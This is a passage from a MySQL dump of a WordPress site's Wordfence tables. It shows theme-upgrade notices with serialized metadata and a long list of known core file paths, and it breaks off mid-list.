released.','a:7:{s:10:\"newVersion\";s:5:\"1.6.1\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/monograph.1.6.1.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/monograph/\";s:4:\"Name\";s:9:\"Monograph\";s:4:\"name\";s:9:\"Monograph\";s:7:\"version\";s:5:\"1.4.1\";s:10:\"vulnerable\";b:0;}'),(2311,1629801262,1629801262,'new','wfThemeUpgrade',50,'a00711ffbaeebf976f984d2e37d591a6','a00711ffbaeebf976f984d2e37d591a6','The Theme \"NewsMag\" needs an upgrade (2.1.6 -> 2.4.3).','You need to upgrade \"NewsMag\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.4.3\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/newsmag.2.4.3.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/newsmag/\";s:4:\"Name\";s:7:\"NewsMag\";s:4:\"name\";s:7:\"NewsMag\";s:7:\"version\";s:5:\"2.1.6\";s:10:\"vulnerable\";b:0;}'),(2312,1629801262,1629801262,'new','wfThemeUpgrade',50,'23cb381dd4c89113ea490aa748f77cc5','23cb381dd4c89113ea490aa748f77cc5','The Theme \"Quicksand\" needs an upgrade (0.6.9 -> 0.7.0).','You need to upgrade \"Quicksand\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"0.7.0\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/quicksand.0.7.0.zip\";s:3:\"URL\";s:39:\"https://wordpress.org/themes/quicksand/\";s:4:\"Name\";s:9:\"Quicksand\";s:4:\"name\";s:9:\"Quicksand\";s:7:\"version\";s:5:\"0.6.9\";s:10:\"vulnerable\";b:0;}'),(2313,1629801262,1629801262,'new','wfThemeUpgrade',50,'fd277920c96439e32954ecefcdaa6f24','fd277920c96439e32954ecefcdaa6f24','The Theme \"SayBusiness\" needs an upgrade (1.1.4 -> 1.1.7).','You need to upgrade \"SayBusiness\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.7\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/saybusiness.1.1.7.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/saybusiness/\";s:4:\"Name\";s:11:\"SayBusiness\";s:4:\"name\";s:11:\"SayBusiness\";s:7:\"version\";s:5:\"1.1.4\";s:10:\"vulnerable\";b:0;}'),(2314,1629801262,1629801262,'new','wfThemeUpgrade',50,'337e89178e7469967cc2b87903897cc9','337e89178e7469967cc2b87903897cc9','The Theme \"Singularity\" needs an upgrade (1.0.9 -> 1.0.11).','You need to upgrade \"Singularity\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:6:\"1.0.11\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/singularity.1.0.11.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/singularity/\";s:4:\"Name\";s:11:\"Singularity\";s:4:\"name\";s:11:\"Singularity\";s:7:\"version\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}'),(2315,1629801262,1629801262,'new','wfThemeUpgrade',50,'f2247f5196b69067e697feead61fdafc','f2247f5196b69067e697feead61fdafc','The Theme \"The Best\" needs an upgrade (1.0.9 -> 1.3.1).','You need to upgrade \"The Best\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.3.1\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/the-best.1.3.1.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/the-best/\";s:4:\"Name\";s:8:\"The Best\";s:4:\"name\";s:8:\"The Best\";s:7:\"version\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}'),(2316,1629801262,1629801262,'new','wfThemeUpgrade',50,'b1f40133224ebd37d11a57212569e7b7','b1f40133224ebd37d11a57212569e7b7','The Theme \"Twenty Nineteen\" needs an upgrade (2.0 -> 2.1).','You need to upgrade \"Twenty Nineteen\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.1.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:4:\"Name\";s:15:\"Twenty Nineteen\";s:4:\"name\";s:15:\"Twenty Nineteen\";s:7:\"version\";s:3:\"2.0\";s:10:\"vulnerable\";b:0;}'),(2317,1629801262,1629801262,'new','wfThemeUpgrade',50,'b4aa3a5a0b6b6ad3791cccd0ead6da3c','b4aa3a5a0b6b6ad3791cccd0ead6da3c','The Theme \"Twenty Twenty\" needs an upgrade (1.7 -> 1.8).','You need to upgrade \"Twenty Twenty\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.8\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.8.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:4:\"Name\";s:13:\"Twenty Twenty\";s:4:\"name\";s:13:\"Twenty Twenty\";s:7:\"version\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}'),(2318,1629801262,1629801262,'new','wfThemeUpgrade',50,'2fe1115c1ca9c416ae1e8e7aea44d03e','2fe1115c1ca9c416ae1e8e7aea44d03e','The Theme \"Twenty Twenty-One\" needs an upgrade (1.3 -> 1.4).','You need to upgrade \"Twenty Twenty-One\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.4\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.4.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:4:\"Name\";s:17:\"Twenty Twenty-One\";s:4:\"name\";s:17:\"Twenty Twenty-One\";s:7:\"version\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}'),(2319,1629801262,1629801262,'new','wfThemeUpgrade',50,'e3e9188dd4fc12310384aed088bb3c99','e3e9188dd4fc12310384aed088bb3c99','The Theme \"University Hub\" needs an upgrade (1.0.4 -> 2.1).','You need to upgrade \"University Hub\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"2.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/university-hub.2.1.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/university-hub/\";s:4:\"Name\";s:14:\"University Hub\";s:4:\"name\";s:14:\"University Hub\";s:7:\"version\";s:5:\"1.0.4\";s:10:\"vulnerable\";b:0;}'),(2320,1629801262,1629801262,'new','wfThemeUpgrade',50,'e0fddaf7a7f70eb435060d9793c829cc','e0fddaf7a7f70eb435060d9793c829cc','The Theme \"Weblog\" needs an upgrade (1.0.1 -> 3.0.4).','You need to upgrade \"Weblog\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.0.4\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/weblog.3.0.4.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/weblog/\";s:4:\"Name\";s:6:\"Weblog\";s:4:\"name\";s:6:\"Weblog\";s:7:\"version\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfknownfilelist`
--

DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=7832 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfknownfilelist`
--

LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wordfence-waf.php'),(5,'wp-activate.php'),(6,'wp-admin/about.php'),(7,'wp-admin/admin-ajax.php'),(8,'wp-admin/admin-footer.php'),(9,'wp-admin/admin-functions.php'),(10,'wp-admin/admin-header.php'),(11,'wp-admin/admin-post.php'),(12,'wp-admin/admin.php'),(13,'wp-admin/async-upload.php'),(14,'wp-admin/authorize-application.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/about-rtl.css'),(18,'wp-admin/css/about-rtl.min.css'),(19,'wp-admin/css/about.css'),(20,'wp-admin/css/about.min.css'),(21,'wp-admin/css/admin-menu-rtl.css'),(22,'wp-admin/css/admin-menu-rtl.min.css'),(23,'wp-admin/css/admin-menu.css'),(24,'wp-admin/css/admin-menu.min.css'),(25,'wp-admin/css/code-editor-rtl.css'),(26,'wp-admin/css/code-editor-rtl.min.css'),(27,'wp-admin/css/code-editor.css'),(28,'wp-admin/css/code-editor.min.css'),(29,'wp-admin/css/color-picker-rtl.css'),(30,'wp-admin/css/color-picker-rtl.min.css'),(31,'wp-admin/css/color-picker.css'),(32,'wp-admin/css/color-picker.min.css'),(33,'wp-admin/css/colors/_admin.scss'),(34,'wp-admin/css/colors/_mixins.scss'),(35,'wp-admin/css/colors/_variables.scss'),(36,'wp-admin/css/colors/blue/colors-rtl.css'),(37,'wp-admin/css/colors/blue/colors-rtl.min.css'),(38,'wp-admin/css/colors/blue/colors.css'),(39,'wp-admin/css/colors/blue/colors.min.css'),(40,'wp-admin/css/colors/blue/colors.scss'),(41,'wp-admin/css/colors/coffee/colors-rtl.css'),(42,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(43,'wp-admin/css/colors/coffee/colors.css'),(44,'wp-admin/css/colors/coffee/colors.min.css'),(45,'wp-admin/css/colors/coffee/colors.scss'),(46,'wp-admin/css/colors/ectoplasm/0.php'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(48,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(49,'wp-admin/css/colors/ectoplasm/colors.css'),(50,'wp-admin/css/colors/ectoplasm/colors.min.css'),(51,'wp-admin/css/colors/ectoplasm/colors.scss'),(52,'wp-admin/css/colors/light/colors-rtl.css'),(53,'wp-admin/css/colors/light/colors-rtl.min.css'),(54,'wp-admin/css/colors/light/colors.css'),(55,'wp-admin/css/colors/light/colors.min.css'),(56,'wp-admin/css/colors/light/colors.scss'),(57,'wp-admin/css/colors/midnight/colors-rtl.css'),(58,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(59,'wp-admin/css/colors/midnight/colors.css'),(60,'wp-admin/css/colors/midnight/colors.min.css'),(61,'wp-admin/css/colors/midnight/colors.scss'),(62,'wp-admin/css/colors/modern/colors-rtl.css'),(63,'wp-admin/css/colors/modern/colors-rtl.min.css'),(64,'wp-admin/css/colors/modern/colors.css'),(65,'wp-admin/css/colors/modern/colors.min.css'),(66,'wp-admin/css/colors/modern/colors.scss'),(67,'wp-admin/css/colors/ocean/colors-rtl.css'),(68,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(69,'wp-admin/css/colors/ocean/colors.css'),(70,'wp-admin/css/colors/ocean/colors.min.css'),(71,'wp-admin/css/colors/ocean/colors.scss'),(72,'wp-admin/css/colors/sunrise/colors-rtl.css'),(73,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(74,'wp-admin/css/colors/sunrise/colors.css'),(75,'wp-admin/css/colors/sunrise/colors.min.css'),(76,'wp-admin/css/colors/sunrise/colors.scss'),(77,'wp-admin/css/common-rtl.css'),(78,'wp-admin/css/common-rtl.min.css'),(79,'wp-admin/css/common.css'),(80,'wp-admin/css/common.min.css'),(81,'wp-admin/css/customize-controls-rtl.css'),(82,'wp-admin/css/customize-controls-rtl.min.css'),(83,'wp-admin/css/customize-controls.css'),(84,'wp-admin/css/customize-controls.min.css'),(85,'wp-admin/css/customize-nav-menus-rtl.css'),(86,'wp-admin/css/customize-nav-menus-rtl.min.css'),(87,'wp-admin/css/customize-nav-menus.css'),(88,'wp-admin/css/customize-nav-menus.min.css'),(89,'wp-admin/css/customize-widgets-rtl.css'),(90,'wp-admin/css/customize-widgets-rtl.min.css'),(91,'wp-admin/css/customize-widgets.css'),(92,'wp-admin/css/customize-widgets.min.css'),(93,'wp-admin/css/dashboard-rtl.css'),(94,'wp-admin/css/dashboard-rtl.min.css'),(95,'wp-admin/css/dashboard.css'),(96,'wp-admin/css/dashboard.min.css'),(97,'wp-admin/css/deprecated-media-rtl.css'),(98,'wp-admin/css/deprecated-media-rtl.min.css'),(99,'wp-admin/css/deprecated-media.css'),(100,'wp-admin/css/deprecated-media.min.css'),(101,'wp-admin/css/edit-rtl.css'),(102,'wp-admin/css/edit-rtl.min.css'),(103,'wp-admin/css/edit.css'),(104,'wp-admin/css/edit.min.css'),(105,'wp-admin/css/farbtastic-rtl.css'),(106,'wp-admin/css/farbtastic-rtl.min.css'),(107,'wp-admin/css/farbtastic.css'),(108,'wp-admin/css/farbtastic.min.css'),(109,'wp-admin/css/forms-rtl.css'),(110,'wp-admin/css/forms-rtl.min.css'),(111,'wp-admin/css/forms.css'),(112,'wp-admin/css/forms.min.css'),(113,'wp-admin/css/index.php'),(114,'wp-admin/css/install-rtl.css'),(115,'wp-admin/css/install-rtl.min.css'),(116,'wp-admin/css/install.css'),(117,'wp-admin/css/install.min.css'),(118,'wp-admin/css/l10n-rtl.css'),(119,'wp-admin/css/l10n-rtl.min.css'),(120,'wp-admin/css/l10n.css'),(121,'wp-admin/css/l10n.min.css'),(122,'wp-admin/css/list-tables-rtl.css'),(123,'wp-admin/css/list-tables-rtl.min.css'),(124,'wp-admin/css/list-tables.css'),(125,'wp-admin/css/list-tables.min.css'),(126,'wp-admin/css/login-rtl.css'),(127,'wp-admin/css/login-rtl.min.css'),(128,'wp-admin/css/login.css'),(129,'wp-admin/css/login.min.css'),(130,'wp-admin/css/media-rtl.css'),(131,'wp-admin/css/media-rtl.min.css'),(132,'wp-admin/css/media.css'),(133,'wp-admin/css/media.min.css'),(134,'wp-admin/css/nav-menus-rtl.css'),(135,'wp-admin/css/nav-menus-rtl.min.css'),(136,'wp-admin/css/nav-menus.css'),(137,'wp-admin/css/nav-menus.min.css'),(138,'wp-admin/css/revisions-rtl.css'),(139,'wp-admin/css/revisions-rtl.min.css'),(140,'wp-admin/css/revisions.css'),(141,'wp-admin/css/revisions.min.css'),(142,'wp-admin/css/site-health-rtl.css'),(143,'wp-admin/css/site-health-rtl.min.css'),(144,'wp-admin/css/site-health.css'),(145,'wp-admin/css/site-health.min.css'),(146,'wp-admin/css/site-icon-rtl.css'),(147,'wp-admin/css/site-icon-rtl.min.css'),(148,'wp-admin/css/site-icon.css'),(149,'wp-admin/css/site-icon.min.css'),(150,'wp-admin/css/themes-rtl.css'),(151,'wp-admin/css/themes-rtl.min.css'),(152,'wp-admin/css/themes.css'),(153,'wp-admin/css/themes.min.css'),(154,'wp-admin/css/widgets-rtl.css'),(155,'wp-admin/css/widgets-rtl.min.css'),(156,'wp-admin/css/widgets.css'),(157,'wp-admin/css/widgets.min.css'),(158,'wp-admin/css/wp-admin-rtl.css'),(159,'wp-admin/css/wp-admin-rtl.min.css'),(160,'wp-admin/css/wp-admin.css'),(161,'wp-admin/css/wp-admin.min.css'),(162,'wp-admin/custom-background.php'),(163,'wp-admin/custom-header.php'),(164,'wp-admin/customize.php'),(165,'wp-admin/edit-comments.php'),(166,'wp-admin/edit-form-advanced.php'),(167,'wp-admin/edit-form-blocks.php'),(168,'wp-admin/edit-form-comment.php'),(169,'wp-admin/edit-link-form.php'),(170,'wp-admin/edit-tag-form.php'),(171,'wp-admin/edit-tags.php'),(172,'wp-admin/edit.php'),(173,'wp-admin/erase-personal-data.php'),(174,'wp-admin/export-personal-data.php'),(175,'wp-admin/export.php'),(176,'wp-admin/freedoms.php'),(177,'wp-admin/images/about-badge.svg'),(178,'wp-admin/images/about-color-palette-vert.svg'),(179,'wp-admin/images/about-color-palette.svg'),(180,'wp-admin/images/about-header-brushes.svg'),(181,'wp-admin/images/align-center-2x.png'),(182,'wp-admin/images/align-center.png'),(183,'wp-admin/images/align-left-2x.png'),(184,'wp-admin/images/align-left.png'),(185,'wp-admin/images/align-none-2x.png'),(186,'wp-admin/images/align-none.png'),(187,'wp-admin/images/align-right-2x.png'),(188,'wp-admin/images/align-right.png'),(189,'wp-admin/images/arrows-2x.png'),(190,'wp-admin/images/arrows.png'),(191,'wp-admin/images/browser-rtl.png'),(192,'wp-admin/images/browser.png'),(193,'wp-admin/images/bubble_bg-2x.gif'),(194,'wp-admin/images/bubble_bg.gif'),(195,'wp-admin/images/comment-grey-bubble-2x.png'),(196,'wp-admin/images/comment-grey-bubble.png'),(197,'wp-admin/images/date-button-2x.gif'),(198,'wp-admin/images/date-button.gif'),(199,'wp-admin/images/freedoms.png'),(200,'wp-admin/images/generic.png'),(201,'wp-admin/images/icons32-2x.png'),(202,'wp-admin/images/icons32-vs-2x.png'),(203,'wp-admin/images/icons32-vs.png'),(204,'wp-admin/images/icons32.png'),(205,'wp-admin/images/imgedit-icons-2x.png'),(206,'wp-admin/images/imgedit-icons.png'),(207,'wp-admin/images/list-2x.png'),(208,'wp-admin/images/list.png'),(209,'wp-admin/images/loading.gif'),(210,'wp-admin/images/marker.png'),(211,'wp-admin/images/mask.png'),(212,'wp-admin/images/media-button-2x.png'),(213,'wp-admin/images/media-button-image.gif'),(214,'wp-admin/images/media-button-music.gif'),(215,'wp-admin/images/media-button-other.gif'),(216,'wp-admin/images/media-button-video.gif'),(217,'wp-admin/images/media-button.png'),(218,'wp-admin/images/menu-2x.png'),(219,'wp-admin/images/menu-vs-2x.png'),(220,'wp-admin/images/menu-vs.png'),(221,'wp-admin/images/menu.png'),(222,'wp-admin/images/no.png'),(223,'wp-admin/images/post-formats-vs.png'),(224,'wp-admin/images/post-formats.png'),(225,'wp-admin/images/post-formats32-vs.png'),(226,'wp-admin/images/post-formats32.png'),(227,'wp-admin/images/privacy.png'),(228,'wp-admin/images/resize-2x.gif'),(229,'wp-admin/images/resize-rtl-2x.gif'),(230,'wp-admin/images/resize-rtl.gif'),(231,'wp-admin/images/resize.gif'),(232,'wp-admin/images/se.png'),(233,'wp-admin/images/sort-2x.gif'),(234,'wp-admin/images/sort.gif'),(235,'wp-admin/images/spinner-2x.gif'),(236,'wp-admin/images/spinner.gif'),(237,'wp-admin/images/stars-2x.png'),(238,'wp-admin/images/stars.png'),(239,'wp-admin/images/w-logo-blue.png'),(240,'wp-admin/images/w-logo-white.png'),(241,'wp-admin/images/wheel.png'),(242,'wp-admin/images/wordpress-logo-white.svg'),(243,'wp-admin/images/wordpress-logo.png'),(244,'wp-admin/images/wordpress-logo.svg'),(245,'wp-admin/images/wpspin_light-2x.gif'),(246,'wp-admin/images/wpspin_light.gif'),(247,'wp-admin/images/xit-2x.gif'),(248,'wp-admin/images/xit.gif'),(249,'wp-admin/images/yes.png'),(250,'wp-admin/import.php'),(251,'wp-admin/includes/admin-filters.php'),(252,'wp-admin/includes/admin.php'),(253,'wp-admin/includes/ajax-actions.php'),(254,'wp-admin/includes/bookmark.php'),(255,'wp-admin/includes/class-automatic-upgrader-skin.php'),(256,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(257,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(258,'wp-admin/includes/class-bulk-upgrader-skin.php'),(259,'wp-admin/includes/class-core-upgrader.php'),(260,'wp-admin/includes/class-custom-background.php'),(261,'wp-admin/includes/class-custom-image-header.php'),(262,'wp-admin/includes/class-file-upload-upgrader.php'),(263,'wp-admin/includes/class-ftp-pure.php'),(264,'wp-admin/includes/class-ftp-sockets.php'),(265,'wp-admin/includes/class-ftp.php'),(266,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(267,'wp-admin/includes/class-language-pack-upgrader.php'),(268,'wp-admin/includes/class-pclzip.php'),(269,'wp-admin/includes/class-plugin-installer-skin.php'),(270,'wp-admin/includes/class-plugin-upgrader-skin.php'),(271,'wp-admin/includes/class-plugin-upgrader.php'),(272,'wp-admin/includes/class-theme-installer-skin.php'),(273,'wp-admin/includes/class-theme-upgrader-skin.php'),(274,'wp-admin/includes/class-theme-upgrader.php'),(275,'wp-admin/includes/class-walker-category-checklist.php'),(276,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(277,'wp-admin/includes/class-walker-nav-menu-edit.php'),(278,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(279,'wp-admin/includes/class-wp-application-passwords-list-table.php'),(280,'wp-admin/includes/class-wp-automatic-updater.php'),(281,'wp-admin/includes/class-wp-comments-list-table.php'),(282,'wp-admin/includes/class-wp-community-events.php'),(283,'wp-admin/includes/class-wp-debug-data.php'),(284,'wp-admin/includes/class-wp-filesystem-base.php'),(285,'wp-admin/includes/class-wp-filesystem-direct.php'),(286,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(287,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(288,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(289,'wp-admin/includes/class-wp-importer.php'),(290,'wp-admin/includes/class-wp-internal-pointers.php'),(291,'wp-admin/includes/class-wp-links-list-table.php'),(292,'wp-admin/includes/class-wp-list-table-compat.php'),(293,'wp-admin/includes/class-wp-list-table.php'),(294,'wp-admin/includes/class-wp-media-list-table.php'),(295,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(296,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(297,'wp-admin/includes/class-wp-ms-users-list-table.php'),(298,'wp-admin/includes/class-wp-plugin-install-list-table.php'),(299,'wp-admin/includes/class-wp-plugins-list-table.php'),(300,'wp-admin/includes/class-wp-post-comments-list-table.php'),(301,'wp-admin/includes/class-wp-posts-list-table.php'),(302,'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),(303,'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),(304,'wp-admin/includes/class-wp-privacy-policy-content.php'),(305,'wp-admin/includes/class-wp-privacy-requests-table.php'),(306,'wp-admin/includes/class-wp-screen.php'),(307,'wp-admin/includes/class-wp-site-health-auto-updates.php'),(308,'wp-admin/includes/class-wp-site-health.php'),(309,'wp-admin/includes/class-wp-site-icon.php'),(310,'wp-admin/includes/class-wp-terms-list-table.php'),(311,'wp-admin/includes/class-wp-theme-install-list-table.php'),(312,'wp-admin/includes/class-wp-themes-list-table.php'),(313,'wp-admin/includes/class-wp-upgrader-skin.php'),(314,'wp-admin/includes/class-wp-upgrader-skins.php'),(315,'wp-admin/includes/class-wp-upgrader.php'),(316,'wp-admin/includes/class-wp-users-list-table.php'),(317,'wp-admin/includes/comment.php'),(318,'wp-admin/includes/continents-cities.php'),(319,'wp-admin/includes/credits.php'),(320,'wp-admin/includes/dashboard.php'),(321,'wp-admin/includes/deprecated.php'),(322,'wp-admin/includes/edit-tag-messages.php'),(323,'wp-admin/includes/export.php'),(324,'wp-admin/includes/file.php'),(325,'wp-admin/includes/image-edit.php'),(326,'wp-admin/includes/image.php'),(327,'wp-admin/includes/import.php'),(328,'wp-admin/includes/list-table.php'),(329,'wp-admin/includes/media.php'),(330,'wp-admin/includes/menu.php'),(331,'wp-admin/includes/meta-boxes.php'),(332,'wp-admin/includes/misc.php'),(333,'wp-admin/includes/ms-admin-filters.php'),(334,'wp-admin/includes/ms-deprecated.php'),(335,'wp-admin/includes/ms.php'),(336,'wp-admin/includes/nav-menu.php'),(337,'wp-admin/includes/network.php'),(338,'wp-admin/includes/noop.php'),(339,'wp-admin/includes/options.php'),(340,'wp-admin/includes/plugin-install.php'),(341,'wp-admin/includes/plugin.php'),(342,'wp-admin/includes/post.php'),(343,'wp-admin/includes/privacy-tools.php'),(344,'wp-admin/includes/revision.php'),(345,'wp-admin/includes/schema.php'),(346,'wp-admin/includes/screen.php'),(347,'wp-admin/includes/taxonomy.php'),(348,'wp-admin/includes/template.php'),(349,'wp-admin/includes/theme-install.php'),(350,'wp-admin/includes/theme.php'),(351,'wp-admin/includes/translation-install.php'),(352,'wp-admin/includes/update-core.php'),(353,'wp-admin/includes/update.php'),(354,'wp-admin/includes/upgrade.php'),(355,'wp-admin/includes/user.php'),(356,'wp-admin/includes/widgets.php'),(357,'wp-admin/index.php'),(358,'wp-admin/install-helper.php'),(359,'wp-admin/install.php'),(360,'wp-admin/js/accordion.js'),(361,'wp-admin/js/accordion.min.js'),(362,'wp-admin/js/application-passwords.js'),(363,'wp-admin/js/application-passwords.min.js'),(364,'wp-admin/js/auth-app.js'),(365,'wp-admin/js/auth-app.min.js'),(366,'wp-admin/js/code-editor.js'),(367,'wp-admin/js/code-editor.min.js'),(368,'wp-admin/js/color-picker.js'),(369,'wp-admin/js/color-picker.min.js'),(370,'wp-admin/js/comment.js'),(371,'wp-admin/js/comment.min.js'),(372,'wp-admin/js/common.js'),(373,'wp-admin/js/common.min.js'),(374,'wp-admin/js/custom-background.js'),(375,'wp-admin/js/custom-background.min.js'),(376,'wp-admin/js/custom-header.js'),(377,'wp-admin/js/customize-controls.js'),(378,'wp-admin/js/customize-controls.min.js'),(379,'wp-admin/js/customize-nav-menus.js'),(380,'wp-admin/js/customize-nav-menus.min.js'),(381,'wp-admin/js/customize-widgets.js'),(382,'wp-admin/js/customize-widgets.min.js'),(383,'wp-admin/js/dashboard.js'),(384,'wp-admin/js/dashboard.min.js'),(385,'wp-admin/js/edit-comments.js'),(386,'wp-admin/js/edit-comments.min.js'),(387,'wp-admin/js/editor-expand.js'),(388,'wp-admin/js/editor-expand.min.js'),(389,'wp-admin/js/editor.js'),(390,'wp-admin/js/editor.min.js'),(391,'wp-admin/js/farbtastic.js'),(392,'wp-admin/js/gallery.js'),(393,'wp-admin/js/gallery.min.js'),(394,'wp-admin/js/image-edit.js'),(395,'wp-admin/js/image-edit.min.js'),(396,'wp-admin/js/inline-edit-post.js'),(397,'wp-admin/js/inline-edit-post.min.js'),(398,'wp-admin/js/inline-edit-tax.js'),(399,'wp-admin/js/inline-edit-tax.min.js'),(400,'wp-admin/js/iris.min.js'),(401,'wp-admin/js/language-chooser.js'),(402,'wp-admin/js/language-chooser.min.js'),(403,'wp-admin/js/link.js'),(404,'wp-admin/js/link.min.js'),(405,'wp-admin/js/media-gallery.js'),(406,'wp-admin/js/media-gallery.min.js'),(407,'wp-admin/js/media-upload.js'),(408,'wp-admin/js/media-upload.min.js'),(409,'wp-admin/js/media.js'),(410,'wp-admin/js/media.min.js'),(411,'wp-admin/js/nav-menu.js'),(412,'wp-admin/js/nav-menu.min.js'),(413,'wp-admin/js/password-strength-meter.js'),(414,'wp-admin/js/password-strength-meter.min.js'),(415,'wp-admin/js/plugin-install.js'),(416,'wp-admin/js/plugin-install.min.js'),(417,'wp-admin/js/post.js'),(418,'wp-admin/js/post.min.js'),(419,'wp-admin/js/postbox.js'),(420,'wp-admin/js/postbox.min.js'),(421,'wp-admin/js/privacy-tools.js'),(422,'wp-admin/js/privacy-tools.min.js'),(423,'wp-admin/js/revisions.js'),(424,'wp-admin/js/revisions.min.js'),(425,'wp-admin/js/set-post-thumbnail.js'),(426,'wp-admin/js/set-post-thumbnail.min.js'),(427,'wp-admin/js/site-health.js'),(428,'wp-admin/js/site-health.min.js'),(429,'wp-admin/js/svg-painter.js'),(430,'wp-admin/js/svg-painter.min.js'),(431,'wp-admin/js/tags-box.js'),(432,'wp-admin/js/tags-box.min.js'),(433,'wp-admin/js/tags-suggest.js'),(434,'wp-admin/js/tags-suggest.min.js'),(435,'wp-admin/js/tags.js'),(436,'wp-admin/js/tags.min.js'),(437,'wp-admin/js/theme-plugin-editor.js'),(438,'wp-admin/js/theme-plugin-editor.min.js'),(439,'wp-admin/js/theme.js'),(440,'wp-admin/js/theme.min.js'),(441,'wp-admin/js/updates.js'),(442,'wp-admin/js/updates.min.js'),(443,'wp-admin/js/user-profile.js'),(444,'wp-admin/js/user-profile.min.js'),(445,'wp-admin/js/user-suggest.js'),(446,'wp-admin/js/user-suggest.min.js'),(447,'wp-admin/js/widgets/custom-html-widgets.js'),(448,'wp-admin/js/widgets/custom-html-widgets.min.js'),(449,'wp-admin/js/widgets/media-audio-widget.js'),(450,'wp-admin/js/widgets/media-audio-widget.min.js'),(451,'wp-admin/js/widgets/media-gallery-widget.js'),(452,'wp-admin/js/widgets/media-gallery-widget.min.js'),(453,'wp-admin/js/widgets/media-image-widget.js'),(454,'wp-admin/js/widgets/media-image-widget.min.js'),(455,'wp-admin/js/widgets/media-video-widget.js'),(456,'wp-admin/js/widgets/media-video-widget.min.js'),(457,'wp-admin/js/widgets/media-widgets.js'),(458,'wp-admin/js/widgets/media-widgets.min.js'),(459,'wp-admin/js/widgets/text-widgets.js'),(460,'wp-admin/js/widgets/text-widgets.min.js'),(461,'wp-admin/js/widgets.js'),(462,'wp-admin/js/widgets.min.js'),(463,'wp-admin/js/word-count.js'),(464,'wp-admin/js/word-count.min.js'),(465,'wp-admin/js/xfn.js'),(466,'wp-admin/js/xfn.min.js'),(467,'wp-admin/link-add.php'),(468,'wp-admin/link-manager.php'),(469,'wp-admin/link-parse-opml.php'),(470,'wp-admin/link.php'),(471,'wp-admin/load-scripts.php'),(472,'wp-admin/load-styles.php'),(473,'wp-admin/maint/repair.php'),(474,'wp-admin/media-new.php'),(475,'wp-admin/media-upload.php'),(476,'wp-admin/media.php'),(477,'wp-admin/menu-header.php'),(478,'wp-admin/menu.php'),(479,'wp-admin/moderation.